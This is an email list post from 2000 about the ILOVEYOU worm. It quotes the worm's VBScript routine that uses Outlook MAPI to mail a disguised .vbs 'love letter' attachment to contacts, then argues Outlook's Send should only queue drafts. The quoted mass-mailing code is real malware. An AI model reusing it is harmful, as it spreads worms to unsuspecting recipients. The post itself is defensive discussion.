Subject: cure: queue as draft when "Send" called (was Re: ILOVEYOU)

From: "James P. Salsman" <[email-masked]>
Date: Sun, 7 May 2000 06:35:16 -0700 (PDT)

"spyder" wrote:
>...
> set regedit=CreateObject("WScript.Shell")
> set out=WScript.CreateObject("Outlook.Application")
> set mapi=out.GetNameSpace("MAPI")
>...
> set male=out.CreateItem(0)
> male.Recipients.Add(malead)
> male.Subject = "ILOVEYOU"
> male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
> male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> male.Send

One solution is to boycott Outlook until MAPI's Send simply queues the 
messages as drafts without sending them.  Suggesting that within Cisco 
shortly after the melissa worm, which I had to personally clean up after, 
I was told that was a "strategic" decision and henceforth I was only to 
make "tactical" recommendations.  Whoops!

People need to learn to stand up to bad engineering, and bad management 
decisions in favor of bad engineering.  As a corallary, people need to 
support good engineering, such as device upload in HTML:
  http://www.sourcexchange.com/WishDetail?wishID=227

Cheers,
James